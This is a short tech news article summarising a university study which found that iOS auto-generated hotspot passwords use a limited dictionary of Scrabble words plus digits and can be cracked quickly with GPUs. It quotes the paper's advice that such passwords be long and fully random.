The ability to turn your iPhone into a Wi-Fi hotspot is a fantastically useful little tool in and of itself. But Apple, being the generous overlord that it is, goes so far as to automatically generate a network key, keeping even the most absent-minded of Wi-Fi-beggared safe and sound. Or so we thought. According to a new study, iOS-generated passwords use a very specific formula—one which the experienced hacker can crack in less than a minute.
Composed by researchers at the German university, the paper—Usability vs. Security: The Everlasting Trade-Off in the Context of Apple iOS Mobile Hotspots—details how iOS's supposedly random, secure passwords are all actually just a simple combination of a short word in the dictionary followed by random numbers.
Admittedly, this method does ensure that every password is different, but there's a limited selection of words that Apple picks from—1,842 words, to be exact. The words came from an open-source Scrabble game, meaning the researchers knew exactly what they were working with—and it showed. They walked away with a 100% password-cracking success rate.
Part of their success was due to advancements in hacking hardware; they used a GPU cluster consisting of four AMD Radeon HD 7970s that let them finish each job within 50 seconds. And this tale of caution is just as much for Apple as it is for the consumer. From the paper:
In the context of mobile hotspots, there is no need to create easily memorisable passwords. After a device has been paired once by typing out the displayed hotspot password, the entered credentials are usually cached within the associating device, and are reused within subsequent connections. System-generated passwords should be reasonably long, and should use a reasonably large character set. Consequently, hotspot passwords should be composed of completely random sequences of letters, numbers, and special characters.
It's a bit unsettling to think about how many iOS users out there right now are effectively just sitting ducks, but Apple along with other companies almost never force you to accept the automatically generated one. There are plenty of genuine random password generators floating around the internet, and it's best to err on the side of caution. And rest assured, these generators aren't pulling from Scrabble. [ZDNet]